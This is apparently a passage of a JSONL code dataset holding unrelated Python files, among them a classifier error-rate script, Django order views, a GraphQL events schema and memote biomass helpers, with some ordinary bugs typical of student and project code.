plt.plot(sample_mean[0][0], sample_mean[0][1], 'rd', markersize=12, markerfacecolor='r', markeredgecolor='w')\nm2, = plt.plot(sample_mean[1][0], sample_mean[1][1], 'gd', markersize=12, markerfacecolor='g', markeredgecolor='w')\nif nclass == 3:\n m3, = plt.plot(sample_mean[2][0], sample_mean[2][1], 'bd', markersize=12, markerfacecolor='b', markeredgecolor='w')\n\n# include legend for class mean vector\nif nclass == 3:\n l1 = plt.legend([m1, m2, m3], ['Class 1 Mean', 'Class 2 Mean', 'Class 3 Mean'], loc=4)\nelse:\n l1 = plt.legend([m1, m2], ['Class 1 Mean', 'Class 2 Mean'], loc=4)\n\nplt.gca().add_artist(l1)\nplt.show()\n\n\n\n#############################training data\nclass1original=training[label_train==1,:]\nlistcountclass1=[]\nfor x in range(np.count_nonzero(label_train==1)):\n d1=math.sqrt((class1original[x,0]-X1mean)**2+(class1original[x,1]-Y1mean)**2)\n d2=math.sqrt((class1original[x,0]-X2mean)**2+(class1original[x,1]-Y2mean)**2)\n if d1<=d2:\n listcountclass1.insert(x,0)\n ##when we insert 0 means correct\n else:\n listcountclass1.insert(x,1)\n ##when we insert 1 means wrong\nclass1err=np.sum(listcountclass1) #how many errors in class1\n\n\nclass2original=training[label_train==2,:]\nlistcountclass2=[]\nfor x in range(np.count_nonzero(label_train==1)):\n d1=math.sqrt((class2original[x,0]-X1mean)**2+(class2original[x,1]-Y1mean)**2)\n d2=math.sqrt((class2original[x,0]-X2mean)**2+(class2original[x,1]-Y2mean)**2)\n if d1>=d2:\n listcountclass2.insert(x,0)\n ##when we insert 0 means correct\n else:\n listcountclass2.insert(x,1)\n ##when we insert 1 means wrong\n\nclass2err=np.sum(listcountclass2) #how many errors in class2\nerrorrate=(class1err+class2err)/(len(class1original)+len(class2original))\nprint('error rate of training data is :',(errorrate)) #The error rate of training data\n\n\n\n#############################testing data\ntesting = np.loadtxt(open(\"synthetic1_test.csv\"), delimiter=\",\")\nlabel_test=testing [:,2]\nclass1originaltest=testing[label_test==1,:]\nlistcountclass1test=[]\nfor x in range(np.count_nonzero(label_test==1)):\n d1test=math.sqrt((class1originaltest[x,0]-X1mean)**2+(class1originaltest[x,1]-Y1mean)**2)\n d2test=math.sqrt((class1originaltest[x,0]-X2mean)**2+(class1originaltest[x,1]-Y2mean)**2)\n if d1test<=d2test:\n listcountclass1test.insert(x,0)\n ##when we insert 0 means correct\n else:\n listcountclass1test.insert(x,1)\n ##when we insert 1 means wrong\nclass1errtest=np.sum(listcountclass1test) #how many errors in class1 in testing data\n\n\nclass2originaltest=testing[label_test==2,:]\nlistcountclass2test=[]\nfor x in range(np.count_nonzero(label_test==1)):\n d1test=math.sqrt((class2originaltest[x,0]-X1mean)**2+(class2originaltest[x,1]-Y1mean)**2)\n d2test=math.sqrt((class2originaltest[x,0]-X2mean)**2+(class2originaltest[x,1]-Y2mean)**2)\n if d1test>=d2test:\n listcountclass2test.insert(x,0)\n ##when we insert 0 means correct\n else:\n listcountclass2test.insert(x,1)\n ##when we insert 1 means wrong\n\nclass2errtest=np.sum(listcountclass2test) #how many errors in class2\nerrorratetest=(class1errtest+class2errtest)/(len(class1originaltest)+len(class2originaltest))\nprint('error rate of testing data is :',(errorratetest)) #The error rate of testing data\n\n\n\n\n\n\n\n\n","sub_path":"Week2 HW/synthetic1.py","file_name":"synthetic1.py","file_ext":"py","file_size_in_byte":6285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613030975","text":"from django.shortcuts import render, HttpResponseRedirect, redirect\nfrom django.db.models import Sum\nfrom .models import Product, Order, Customer, Delivery\nfrom datetime import datetime\nfrom django.http import Http404, JsonResponse\nfrom django.utils.datastructures import MultiValueDictKeyError\n\n# Create your views here.\ndef index(request):\n products = Product.objects.filter(sellNow=1)\n context = {'products': products, 'counts': range(1,11)}\n return render(request, 'mobileorder/ordermain.html', context)\n\n\ndef makeOrder(request):\n \"\"\"주문 들어오면 모델로 저장해주는 함��\"\"\"\n # 폼에서 들어오는 녀석들 일단 다 받기\n name = request.POST['customerName']\n tel = request.POST['tel']\n\n receiver = request.POST['customerName2']\n rec_tel = request.POST['tel2']\n email = request.POST['email']\n postcode = request.POST['sample2_postcode']\n address = request.POST['sample2_Address']\n detail = request.POST['detail_Address']\n order_pro = triming_pro(request.POST['products'].split(','))[:-1]\n order_vol = request.POST['volumes'].split(',')[:-1]\n orderNum = createOrderNum()\n # 해당 이메일 고유키로 현재 해당 고객 있는지 확인하고 객체 생성하기\n cus, created = Customer.objects.get_or_create(mail=email, defaults={'name': name, 'phone': tel,\n 'address': address,\n 'detail': detail, 'postcode': postcode})\n if created == False:\n addr_concent = address == cus.address\n if cus.name != name:\n pass\n else: addr_concent = True\n\n deli = Delivery.objects.create(userID=cus, orderNum=orderNum, moneyName=name)\n product_list = []\n total_cost = 0\n # 전체 상품 돌면서 주문 객체 만들어 집어넣어줌\n for pro, vol in zip(order_pro, order_vol):\n try:\n product = Product.objects.get(product=pro)\n except:\n print(\"상품을 찾지 못했습니다.\")\n\n vol = int(vol)\n if product.stocks < vol:\n message = product.product + \"- 해당 상품의 재고가 부족합니다.\"\n return Http404(message)\n order = Order.objects.create(userID=cus, deliverID=deli, orderNum=orderNum, product=product,\n orderVolume=vol, total=product.price*vol, sender=receiver,\n sendingAdr=address, sendingDetail=detail, senderTel=rec_tel)\n\n # 컨텍스트에 실어서 다시 주문확인 페이지 보내줄 녀석들 만드는 부분\n product_list.append(order)\n total_cost += product.price*vol\n\n context = {'orderNum':orderNum, 'customer':cus, 'goods':product_list, 'created': created,\n 'addr_concent': addr_concent, 'total':total_cost}\n return render(request, 'mobileorder/payment.html', context=context)\n\n\ndef triming_pro(list):\n \"\"\"주문상품 form 들어오면 트리밍 해주는 함수\"\"\"\n new_list = []\n for i, pro in enumerate(list):\n proName = pro.split(':')[0]\n new_list.append(proName.strip())\n return new_list\n\n\ndef createOrderNum():\n \"\"\"주문번호 생성하는 함수\n 해당날짜 + 가장 최근 주문번호 다음으로 채번하는 형태임\"\"\"\n today = datetime.now()\n try:\n latest = Order.objects.latest('orderDate')\n if latest.orderDate.day + 1 == today.day:\n numbering = 1000\n else:\n numbering = int(latest.orderNum[-4:]) + 1\n except:\n numbering = 1000\n\n orderNum = today.strftime('%Y%m%d') + str(numbering)\n return orderNum\n\n\ndef showFinal(request):\n ordernum = request.POST['order_num']\n transfer = request.POST['transfer_name']\n # 입금자명 들어온 폼으로 업데이트\n # 현재 주문 총액 정보 order 모델에서 끌어와서 업데이트\n money_sum = Order.objects.filter(orderNum=ordernum).aggregate(Sum('total'))\n deli = Delivery.objects.get(orderNum=ordernum)\n deli.moneyName = transfer\n deli.moneySum = money_sum['total__sum']\n deli.save()\n # 주문지 최신화 체크박스 들어오는 경우 주소 업데이트\n try:\n check = request.POST['update_check']\n if check == 'yes':\n order = Order.objects.filter(orderNum=ordernum).first()\n cus = Customer.objects.get(pk=order.userID_id)\n cus.address = order.sendingAdr\n cus.detail = order.sendingDetail\n cus.save()\n except Order.DoesNotExist: print(\"오더에러\")\n except Customer.DoesNotExist: print(\"커스터머에러\")\n except MultiValueDictKeyError: pass\n\n return render(request, 'mobileorder/complete.html')\n\n\ndef orderFind(request):\n return render(request, 'mobileorder/orderfind.html')\n\n\ndef orderRedirect(request):\n\n try:\n mail = request.POST['mail']\n except MultiValueDictKeyError:\n return redirect('main')\n\n try:\n cus = Customer.objects.get(mail=mail)\n except Customer.DoesNotExist:\n raise Http404(\"해당 메일의 고객 정보가 없습니다!\")\n\n return HttpResponseRedirect('/orderdetail/%d/' % cus.pk)\n\n\ndef orderDetail(request, cusID):\n try:\n cus = Customer.objects.get(pk=cusID)\n except Customer.DoesNotExist:\n raise Http404(\"해당 메일의 고객 정보가 없습니다!\")\n deli = Delivery.objects.filter(userID_id=cus).values()\n order_nums = []\n for i in deli:\n order_nums.append(i)\n\n context = {'customer': cus, 'deliveries': deli}\n\n return render(request, 'mobileorder/orderdetail.html', context=context)\n\ndef ordersGet(request, orderNum):\n orders = Order.objects.filter(orderNum=orderNum)\n first = orders.first()\n total = 0\n for o in orders:\n total += o.total\n\n return render(request, 'mobileorder/orderNumget.html', {'orders':orders, 'first': first, 'total':total})\n\n\ndef stockFetch(request):\n product = request.GET.get('product',)\n response = {\n 'stock': Product.objects.get(product=product).stocks\n }\n return JsonResponse(response)\n\n","sub_path":"mobileorder/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"100161673","text":"from collections import defaultdict\n\n\ndef dfs(index, flag=0):\n global cost, clib, cpath, adj, color\n if flag==1:cost += clib\n else:\n cost += cpath\n color[index] = 1\n for i in range(len(adj[index])):\n vertex = adj[index][i]\n if not color[vertex]:dfs(vertex)\n return None\n\nfor _ in range(int(input())):\n color = [0] * 100010\n cost = 0\n n, m, clib, cpath = [int(x) for x in input().split()]\n adj = defaultdict(list)\n for i in range(m):\n u, v = [int(x) for x in input().split()]\n adj[u].append(v)\n adj[v].append(u)\n if clib < cpath:\n print(n * clib)\n else:\n for i in range(1, n+1):\n if color[i] == 0:\n dfs(i, 1)\n print(cost)\n\n","sub_path":"Hackerrank/road_and_libs.py","file_name":"road_and_libs.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"130570805","text":"from PIL import Image\nimport numpy as np\n\ndiff = [10, 50]\n\nbase = np.zeros((1080, 960, 3), dtype=np.uint8)\nbase += 128\n\nleft0 = base.copy()\nleft0 -= diff[0]\nImage.fromarray(left0).save('../display/data/left0.png')\nleft1 = base.copy()\nleft1 += diff[0]\nImage.fromarray(left1).save('../display/data/left1.png')\n\nright0 = base.copy()\nright0 -= diff[1]\nImage.fromarray(right0).save('../display/data/right0.png')\nright1 = base.copy()\nright1 += diff[1]\nImage.fromarray(right1).save('../display/data/right1.png')\n\n","sub_path":"ImageProcessing/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"641208206","text":"import numpy as np\n\n\nclass MonsterHunter:\n def __init__(self, min_monster_num=1, max_monster_num=1e3, min_focus_damage=2, max_focus_damage=1e1, min_aoe_damage=1, min_hp=1, max_hp=1e3):\n self.min_monster_num = min_monster_num\n self.max_monster_num = max_monster_num\n self.min_focus_damage = min_focus_damage\n self.max_focus_damage = max_focus_damage\n self.min_aoe_damage = min_aoe_damage\n self.min_hp = min_hp\n self.max_hp = max_hp\n self.monster_num = None\n self.focus_damage = None\n self.aoe_damage = None\n self.monster_hps = None\n \n @property\n def parameters(self):\n parameters = {\"monster_num\": [self.monster_num],\n \"focus_damage\": [self.focus_damage],\n \"aoe_damage\": [self.aoe_damage],\n \"monster_hps\": [self.monster_hps]}\n \n return parameters\n\n def reset(self):\n \"\"\" Initial environment parameters. \"\"\"\n self.monster_num = np.random.randint(self.min_monster_num, self.max_monster_num)\n self.focus_damage = np.random.randint(self.min_focus_damage, self.max_focus_damage)\n self.aoe_damage = np.random.randint(self.min_aoe_damage, self.focus_damage)\n self.monster_hps = np.random.randint(self.min_hp, self.max_hp, size=(self.monster_num, ))\n\n def action(self, attack_num):\n \"\"\"\n This method check whether with the given attack number will all the monsters die.\n Return: True if all monsters die.\n False otherwise.\n \"\"\"\n if attack_num < 0:\n attack_num = 0\n\n # Fetch monster hps\n t_monster_hps = self.monster_hps.copy()\n\n # Calculate aoe attack all\n aoe_damage_all = self.aoe_damage * attack_num\n\n # Attack all monster with aoe damage\n for i in range(len(t_monster_hps)):\n if aoe_damage_all > t_monster_hps[i]:\n t_monster_hps[i] = 0\n else:\n t_monster_hps[i] -= aoe_damage_all\n\n # Calculate how many focus attack needed to kill all remain monster\n focus_attack_num = 0\n damage = self.focus_damage - self.aoe_damage\n for i in range(len(t_monster_hps)):\n if t_monster_hps[i] > 0:\n if t_monster_hps[i] % damage == 0:\n focus_attack_num += t_monster_hps[i] // damage\n else:\n focus_attack_num += t_monster_hps[i] // damage + 1\n\n # Return\n if focus_attack_num <= attack_num:\n return True\n else:\n return False\n","sub_path":"environments/monster_hunter/MonsterHunter.py","file_name":"MonsterHunter.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"549919999","text":"## Creates course assessment files for CAC purposes\n# Peter Ryan Nov 2018\n\nimport pandas as pd\nimport openpyxl\nfrom openpyxl.styles import Alignment\nfrom tabulate import tabulate\n\nimport sys\nimport re\nsys.path.append('c:\\\\Peter\\\\GitHub\\\\CoB\\\\')\n\n\ndef get_school_name(school_code):\n if school_code == '610P':\n return 'CBO'\n if school_code == '615H':\n return 'ACCT'\n if school_code == '620H':\n return 'BITL'\n if school_code == '625H':\n return 'EFM'\n if school_code == '630H':\n return 'MGT'\n if school_code == '650T':\n return 'VBE'\n if school_code == '660H':\n return 'GSBL'\n if school_code == 'VN':\n return 'SBM'\n return None\n\n\ndef cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\ndef get_PLOs(text, prog=None):\n try:\n if 'BP141' in prog:\n print(text)\n text = cleanhtml(text)\n print(text)\n PLOs = (text.split('\\n'))\n PLOs_2 = []\n for lo in PLOs:\n lo = lo.strip()\n lo = lo.rstrip()\n lo = lo.strip('-')\n lo = lo.strip('•')\n lo = lo.strip('*')\n lo = lo.strip('1')\n lo = lo.strip('2')\n lo = lo.strip('3')\n lo = lo.strip('4')\n lo = lo.strip('5')\n lo = lo.strip('6')\n lo = lo.strip('7')\n lo = lo.strip('8')\n lo = lo.strip('9')\n lo = lo.strip('.')\n if lo.startswith(\":\"):\n return lo[1:]\n lo = lo.strip(')')\n lo = lo.strip('\\uf0a7')\n lo = lo.strip()\n \n if len(lo) > 10:\n PLOs_2.append(lo)\n \n while PLOs_2[0][-1] != ':':\n PLOs_2 = PLOs_2[1:]\n PLOs_2 = PLOs_2[1:]\n return(PLOs_2)\n \n except Exception as e:\n print(e)\n print(prog)\n #print(text)\n return['']\n\n# open template\ndirectory = 'H:\\\\Projects\\\\CoB\\\\Program Transformation\\\\CLO mapping\\\\'\nclo_filename = 'PLOs_cob_unedited.xlsx'\ntemplate = 'PLO_template.xlsx'\nsavefile = 'PLO_cob.xlsx'\n\n\n# open template\nwb = openpyxl.load_workbook(directory+template)\n\n# fill CLOs worksheet\nplo_df = pd.read_excel(open(directory+clo_filename, 'rb'))\nplo_ws = wb.active\n\nj = 2\nfor i, r in plo_df.iterrows():\n if r['Status'] in ['Republished', 'Published']:\n school_code = r['Owning School'].split('(')[1][:-1]\n PLO_list = get_PLOs(r['Statement of Capabilities'], '{} {}'.format(r['Program Code'], r['Plan Code']))\n k = 1\n for plo in PLO_list:\n plo_ws.cell(row=j, column=1).value = r['Program Code']\n plo_ws.cell(row=j, column=2).value = r['Plan Code']\n plo_ws.cell(row=j, column=3).value = r['Program Name']\n plo_ws.cell(row=j, column=4).value = r['Career']\n plo_ws.cell(row=j, column=5).value = school_code\n plo_ws.cell(row=j, column=6).value = get_school_name(school_code)\n plo_ws.cell(row=j, column=7).value = 'PLO{}'.format(k)\n plo_ws.cell(row=j, column=8).alignment = Alignment(wrapText=True)\n plo_ws.cell(row=j, column=8).value = plo\n plo_ws.cell(row=j, column=9).value = r['Status']\n plo_ws.cell(row=j, column=10).value = r['Created Date']\n j += 1\n k += 1\nwb.save(directory+savefile)\n\n\n\n","sub_path":"PLO alignment/PLO_separation.py","file_name":"PLO_separation.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"250419414","text":"class Person(object):\r\n def __init__(self,name,age,position):\r\n self.Name = name\r\n self.Age = age\r\n self.Position = position\r\n\r\n def show_info(self):\r\n print(\"이름 : {}\".format(self.Name))\r\n print(\"나이 : {}\".format(self.Age))\r\n print(\"직위 : {}\".format(self.Position))\r\n print(\"저는 한국성서대학교 연구소 {0} {1} 입니다. 나이는 {2} 입니다.\".format(self.Position,self.Name,self.Age))\r\nclass Researcher(Person):\r\n def __init__(self,name,age,position,degree):\r\n Person.__init__(self,name,age,position)\r\n self.Degree = degree\r\n def show_info(self):\r\n Person.show_info(self)\r\n print(\"저는 {} 입니다.\".format(self.Degree))\r\n\r\nif __name__ == '__main__':\r\n researcher_john = Researcher(\"John\", \"22\", \"연구원\", \"학사\")\r\n researcher_Tedd = Researcher(\"Tedd\", \"40\", \"소장\", \"박사\")\r\n researcher_john.show_info()\r\n print(\"=\"*50)\r\n researcher_Tedd.show_info()\r\n","sub_path":"2019년_1학기_기말고사/시험공부/파이썬 10단원 연습문제 예제_5.py","file_name":"파이썬 10단�� 연습문제 예제_5.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"426991951","text":"import graphene\nfrom graphene_sqlalchemy import SQLAlchemyObjectType\nfrom graphql import GraphQLError\n\nfrom api.events.models import Events as EventsModel\nfrom api.room.models import Room as RoomModel\nfrom helpers.calendar.events import RoomSchedules, CalendarEvents\n\n\nclass Events(SQLAlchemyObjectType):\n \"\"\"\n Returns the events payload\n \"\"\"\n class Meta:\n model = EventsModel\n\n\nclass EventCheckin(graphene.Mutation):\n \"\"\"\n Returns the eventcheckin payload\n \"\"\"\n class Arguments:\n calendar_id = graphene.String(required=True)\n event_id = graphene.String(required=True)\n event_title = graphene.String(required=True)\n start_time = graphene.String(required=True)\n end_time = graphene.String(required=True)\n number_of_participants = graphene.Int(required=True)\n check_in_time = graphene.String(required=False)\n event = graphene.Field(Events)\n\n def mutate(self, info, **kwargs):\n room_id, event = check_event_in_db(self, info, \"checked_in\", **kwargs)\n if not event:\n event = EventsModel(\n event_id=kwargs['event_id'],\n room_id=room_id,\n event_title=kwargs['event_title'],\n start_time=kwargs['start_time'],\n end_time=kwargs['end_time'],\n number_of_participants=kwargs['number_of_participants'],\n checked_in=True,\n cancelled=False)\n event.save()\n return EventCheckin(event=event)\n\n\nclass CancelEvent(graphene.Mutation):\n \"\"\"\n Returns the payload on event cancelation\n \"\"\"\n class Arguments:\n calendar_id = graphene.String(required=True)\n event_id = graphene.String(required=True)\n event_title = graphene.String(required=True)\n start_time = graphene.String(required=True)\n end_time = graphene.String(required=True)\n number_of_participants = graphene.Int()\n event = graphene.Field(Events)\n\n def mutate(self, info, **kwargs):\n # mutation to create an event\n room_id, event = check_event_in_db(self, info, \"cancelled\", **kwargs)\n if not event:\n event = EventsModel(\n event_id=kwargs['event_id'],\n room_id=room_id,\n event_title=kwargs['event_title'],\n start_time=kwargs['start_time'],\n end_time=kwargs['end_time'],\n number_of_participants=kwargs['number_of_participants'],\n checked_in=False,\n cancelled=True)\n event.save()\n\n return CancelEvent(event=event)\n\n\nclass EndEvent(graphene.Mutation):\n \"\"\"\n Mutation to end an event\n Returns event payload on ending the event\n \"\"\"\n class Arguments:\n calendar_id = graphene.String(required=True)\n event_id = graphene.String(required=True)\n start_time = graphene.String(required=True)\n end_time = graphene.String(required=True)\n meeting_end_time = graphene.String(required=True)\n event = graphene.Field(Events)\n\n def mutate(self, info, **kwargs):\n room_id, event = check_event_in_db(self, info, \"ended\", **kwargs)\n if not event:\n event = EventsModel(\n event_id=kwargs['event_id'],\n meeting_end_time=kwargs['meeting_end_time']\n )\n event.save()\n\n return EndEvent(event=event)\n\n\nclass SyncEventData(graphene.Mutation):\n \"\"\"\n Mutation to sync the event data in the db\n with the one on google calendar\n \"\"\"\n message = graphene.String()\n\n def mutate(self, info):\n CalendarEvents().sync_all_events()\n return SyncEventData(message=\"success\")\n\n\nclass MrmNotification(graphene.Mutation):\n \"\"\"\n Mutation to receive notification from MRM_PUSH\n service\n \"\"\"\n message = graphene.String()\n\n class Arguments:\n calendar_id = graphene.String()\n\n def mutate(self, info, calendar_id):\n room = RoomModel.query.filter_by(calendar_id=calendar_id).first()\n CalendarEvents().sync_single_room_events(room)\n return MrmNotification(message=\"success\")\n\n\ndef check_event_in_db(instance, info, event_check, **kwargs):\n room_id = RoomSchedules().check_event_status(info, **kwargs)\n event = EventsModel.query.filter_by(\n start_time=kwargs['start_time'],\n event_id=kwargs['event_id']).scalar()\n if event and event_check == 'cancelled':\n event.cancelled = True\n event.save()\n return room_id, event\n elif event and event_check == 'checked_in':\n event.checked_in = True\n if 'check_in_time' in kwargs:\n event.check_in_time = kwargs['check_in_time']\n else:\n event.check_in_time = None\n event.save()\n return room_id, event\n elif event and event_check == 'ended':\n if event.meeting_end_time:\n raise GraphQLError(\"Event has already ended\")\n event.meeting_end_time = kwargs['meeting_end_time']\n event.save()\n return room_id, event\n return room_id, event\n\n\nclass Mutation(graphene.ObjectType):\n event_checkin = EventCheckin.Field()\n cancel_event = CancelEvent.Field()\n end_event = EndEvent.Field(\n description=\"Mutation to end a calendar event given the arguments\\\n \\n- calendar_id: The unique identifier of the calendar event\\\n [required]\\n- event_id: The unique identifier of the target\\\n calendar event[required]\\\n \\n- event_id: The unique identifier of the calendar event[required]\\\n \\n- start_time: The start time of the calendar event[required]\\\n \\n- end_time: The field with the end time of the calendar event\\\n [required]\\\n \\n- meeting_end_time: The time the calendar event ended[required]\")\n sync_event_data = SyncEventData.Field()\n mrm_notification = MrmNotification.Field()\n event_checkin = EventCheckin.Field(\n description=\"Mutation to check in to a calendar event given the arguments\\\n \\n- calendar_id: The unique identifier of the calendar event\\\n [required]\\n- event_id: The unique identifier of the target\\\n calendar event[required]\\\n \\n- event_title: The title field of the calendar event[required]\\\n \\n- start_time: The start time of the calendar event[required]\\\n \\n- end_time: The field with the end time of the calendar event\\\n [required]\")\n cancel_event = CancelEvent.Field(\n description=\"Mutation to cancel a claendar event given the arguments\\\n \\n- calendar_id: The unique identifier of the calendar event\\\n [required]\\n- event_id: The unique identifier of the target \\\n calendar event\\\n [required]\\n- event_title: The title field of the calendar event\\\n [required]\\n- start_time: The start time of the calendar event\\\n [required]\\n- end_time: The field with the end time of the calendar\\\n event[required]\")\n","sub_path":"api/events/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561909855","text":"\"\"\"\nModule for splitting docstring into `Section` groups.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom typing import Text, List, Generator\n\nfrom fhdoc.utils.indent_trimmer import IndentTrimmer\n\n\nclass SectionBlock:\n\t\"\"\"\n\tDataclass representing a `Section` block.\n\n\tArguments:\n\t\tlines -- List of lines.\n\t\"\"\"\n\n\tdef __init__(self, lines):\n\t\t# type: (List[Text]) -> None\n\t\tself.lines = lines\n\n\tdef render(self):\n\t\t# type: () -> Text\n\t\t\"\"\"\n\t\tRender trimmed block lines.\n\n\t\tReturns:\n\t\t\tBlock lines as a text.\n\t\t\"\"\"\n\t\tlines = IndentTrimmer.trim_lines(self.lines)\n\t\treturn \"\\n\".join(lines)\n\n\nclass Section:\n\t\"\"\"\n\tDataclass representing a section in a `SectionMap`.\n\n\tArguments:\n\t\ttitle -- Section title.\n\t\tblocks -- List of line blocks.\n\t\"\"\"\n\n\tdef __init__(self, title, blocks):\n\t\t# type: (Text, List[SectionBlock]) -> None\n\t\tself.title = title\n\t\tself.blocks = blocks\n\n\tdef render(self):\n\t\t# type: () -> Text\n\t\t\"\"\"\n\t\tRender all Section block lines.\n\n\t\tReturns:\n\t\t\tSection lines as a text.\n\t\t\"\"\"\n\t\tresult = []\n\t\tfor block in self.blocks:\n\t\t\tresult.append(block.render())\n\n\t\treturn \"\\n\\n\".join(result)\n\n\nclass SectionMap(dict):\n\t\"\"\"\n\tDict-based storage for parsed `Section` list for\n\t`fhdoc.processors.base.BaseDocstringProcessor`\n\n\tKey is a `Section` title.\n\tValue is a related `Section` instance.\n\t\"\"\"\n\n\tdef __init__(self):\n\t\t# type: () -> None\n\t\tsuper(SectionMap, self).__init__()\n\t\tself._order = [] # type: List[Text]\n\n\tdef add_line_indent(self, section_name, line):\n\t\t# type: (Text, Text) -> None\n\t\t\"\"\"\n\t\tAdd line respecting indent of the current section block.\n\n\t\tArguments:\n\t\t\tsection_name -- Target section title\n\t\t\tline -- Line to add\n\t\t\"\"\"\n\t\tif section_name in self:\n\t\t\tsection = self[section_name]\n\t\t\tif section.blocks and section.blocks[-1].lines:\n\t\t\t\tindent = IndentTrimmer.get_line_indent(section.blocks[-1].lines[-1])\n\t\t\t\tline = IndentTrimmer.indent_line(line, indent)\n\n\t\tself.add_line(section_name, line)\n\n\tdef add_line(self, section_name, line):\n\t\t# type: (Text, Text) -> None\n\t\t\"\"\"\n\t\tAdd new `line` to the last `SectionBlock` of section `section_name`.\n\t\tIf line and section are empty - section is not created.\n\n\t\tArguments:\n\t\t\tsection_name -- Target section title\n\t\t\tline -- Line to add\n\t\t\"\"\"\n\t\tif section_name not in self:\n\t\t\tif not line:\n\t\t\t\treturn\n\n\t\t\tself._order.append(section_name)\n\t\t\tself[section_name] = Section(title=section_name, blocks=[])\n\n\t\tsection = self[section_name]\n\t\tif not section.blocks:\n\t\t\tsection.blocks.append(SectionBlock(lines=[]))\n\n\t\tself[section_name].blocks[-1].lines.append(line)\n\n\tdef add_block(self, section_name):\n\t\t# type: (Text) -> None\n\t\t\"\"\"\n\t\tAdd new `SectionBlock` to section `section_name`.\n\t\tIf `Section` does not exist - it is not created.\n\n\t\tArguments:\n\t\t\tsection_name -- Target section title\n\t\t\"\"\"\n\t\tif section_name not in self:\n\t\t\treturn\n\n\t\tself[section_name].blocks.append(SectionBlock(lines=[]))\n\n\tdef trim_block(self, section_name):\n\t\t# type: (Text) -> None\n\t\t\"\"\"\n\t\tDelete last empty lines from the last `SectionBlock`.\n\t\tIf `Section` does not exist - it is not created.\n\n\t\tArguments:\n\t\t\tsection_name -- Target section title.\n\t\t\"\"\"\n\t\tif section_name not in self:\n\t\t\treturn\n\n\t\tlines = self[section_name].blocks[-1].lines\n\t\twhile lines and not lines[-1].strip():\n\t\t\tlines.pop()\n\n\t@property\n\tdef sections(self):\n\t\t# type: () -> Generator[Section, None, None]\n\t\t\"\"\"\n\t\tIterate over existing `Section` objects.\n\n\t\tYields:\n\t\t\t`Section` objects in order of appearance.\n\t\t\"\"\"\n\t\tfor section_name in self._order:\n\t\t\tyield self[section_name]\n","sub_path":"fhdoc/processors/section_map.py","file_name":"section_map.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"22592397","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2017 Novo Nordisk Foundation Center for Biosustainability,\n# Technical University of Denmark.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Supporting functions for biomass consistency checks.\"\"\"\n\nfrom __future__ import absolute_import\n\nimport logging\n\nfrom six import iteritems\nfrom cobra.exceptions import Infeasible\n\nimport memote.support.helpers as helpers\n\n__all__ = (\n \"sum_biomass_weight\", \"find_biomass_precursors\",\n \"find_blocked_biomass_precursors\")\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef sum_biomass_weight(reaction):\n \"\"\"\n Compute the sum of all reaction compounds.\n\n Parameters\n ----------\n reaction : cobra.core.reaction.Reaction\n The biomass reaction of the model under investigation.\n\n \"\"\"\n return sum(-coef * met.formula_weight\n for (met, coef) in iteritems(reaction.metabolites)) / 1000.0\n\n\ndef find_biomass_precursors(reaction):\n \"\"\"\n Return a list of all biomass precursors excluding ATP and H2O.\n\n Parameters\n ----------\n reaction : cobra.core.reaction.Reaction\n The biomass reaction of the model under investigation.\n\n \"\"\"\n return [met for met in reaction.reactants\n if met.id != 'atp_c' or met.id != 'h2o_c']\n\n\ndef find_blocked_biomass_precursors(reaction, model):\n \"\"\"\n Return a list of all biomass precursors that cannot be produced.\n\n Parameters\n ----------\n reaction : cobra.core.reaction.Reaction\n The biomass reaction of the model under investigation.\n\n model : cobra.Model\n The metabolic model under investigation.\n\n \"\"\"\n LOGGER.debug(\"Finding blocked biomass precursors\")\n precursors = find_biomass_precursors(reaction)\n blocked_precursors = list()\n for precursor in precursors:\n with model:\n dm_rxn = model.add_boundary(precursor, type=\"demand\")\n model.objective = dm_rxn\n try:\n solution = model.optimize()\n LOGGER.debug(\n \"%s: demand flux is '%g' and solver status is '%s'\",\n str(precursor), solution.objective_value, solution.status)\n if solution.objective_value <= 0.0:\n blocked_precursors.append(precursor)\n except Infeasible:\n blocked_precursors.append(precursor)\n return blocked_precursors\n\n\ndef gam_in_biomass(reaction):\n \"\"\"\n Return boolean if biomass reaction includes growth-associated maintenance.\n\n Parameters\n ----------\n reaction : cobra.core.reaction.Reaction\n The biomass reaction of the model under investigation.\n\n \"\"\"\n left = set([\"atp_c\", \"h2o_c\"])\n right = set([\"adp_c\", \"pi_c\", \"h_c\"])\n return (\n left.issubset(met.id for met in reaction.reactants) and\n right.issubset(met.id for met in reaction.products))\n\n\ndef find_direct_metabolites(model, reaction):\n \"\"\"\n Return list of possible direct biomass precursor metabolites.\n\n Parameters\n ----------\n model : 